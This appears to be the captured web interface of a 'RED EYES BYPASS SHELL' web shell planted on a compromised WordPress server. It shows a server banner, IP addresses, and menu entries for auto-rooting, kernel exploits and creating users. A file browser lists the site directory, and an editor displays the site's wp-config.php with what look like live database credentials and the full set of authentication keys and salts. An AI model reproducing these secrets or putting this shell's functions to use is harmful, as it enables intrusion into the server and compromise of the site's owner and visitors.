Linux lamp-ubuntu-s-1vcpu-1gb-amd-blr1-01 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Apache/2.4.41 (Ubuntu)
: 68.183.95.231 | : 216.73.216.86
pkexec version 0.105
Cant Read [ /etc/named.conf ]
root
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
var /
www /
asia-pacific.org /
public_html /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
270
B
-rwxr-xr-x
index.php
405
B
-rwxr-xr-x
license.txt
19.45
KB
-rwxr-xr-x
readme.html
7.23
KB
-rwxr-xr-x
wp-activate.php
7
KB
-rwxr-xr-x
wp-blog-header.php
351
B
-rwxr-xr-x
wp-comments-post.php
2.28
KB
-rwxr-xr-x
wp-config-sample.php
2.84
KB
-rwxr-xr-x
wp-config.php
3.15
KB
-rwxr-xr-x
wp-cron.php
3.85
KB
-rwxr-xr-x
wp-links-opml.php
2.44
KB
-rwxr-xr-x
wp-load.php
3.88
KB
-rwxr-xr-x
wp-login.php
47.36
KB
-rwxr-xr-x
wp-mail.php
8.38
KB
-rwxr-xr-x
wp-settings.php
23.15
KB
-rwxr-xr-x
wp-signup.php
31.3
KB
-rwxr-xr-x
wp-trackback.php
4.64
KB
-rwxr-xr-x
xmlrpc.php
3.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('FS_METHOD','direct'); define( 'DB_NAME', 'asiapacific' ); /** MySQL database username */ define( 'DB_USER', 'root' ); /** MySQL database password */ define( 'DB_PASSWORD', 'sunil2021GJ' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '*R}%yiR1%9t|;Hw:|-_c&<-W,#dzqrV#@BF`]DN0r-O6h/:y9`_:EeG~G{Zi8:%m' ); define( 'SECURE_AUTH_KEY', 'fjm3[jk)dj^Yc6a&VUHQo?bZT!0XEQ:vf6p[}L[4antc2K$PYJb,UGG)hdO(_&&X' ); define( 'LOGGED_IN_KEY', '7_sl_CF:aH&.=d]1p1L4zXPh(QEM@*m8<B0t3|u/y9tBbaw(I%Oj!&g}v{;9UVPJ' ); define( 'NONCE_KEY', 'GF?)KC%u`=b!1gmI,^|j$o>#d>}cJ4gg]P|(2hSMWqy_MH#8*KYzA7(9_6GbE#JA' ); define( 'AUTH_SALT', 'o)35r]oA*{j}QlU|be{T3c34 ;IMf3m5^l3<L} kcV[nK}}T,uyX~SVbU<uat/6!' ); define( 'SECURE_AUTH_SALT', 'lZ0?Q@gmt`o+Vwlzcp3/gqk$6)OFMr7Dg2|S[o|0hyoOK%Z A`>{t%53g W**v=e' ); define( 'LOGGED_IN_SALT', 'I]C}S&qI/I]GE*;?jDIwjW->? `H.^%n?~yVE-i(96,#y7<Y|/==EM3Ho:=[Y99>' ); define( 'NONCE_SALT', 'n:8nJ`;/i,{D0<osgBN^kB7~C~<J.ru*ltXJEf&Qe9Z~j1%&jhxE*XE/b7.t7^^V' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close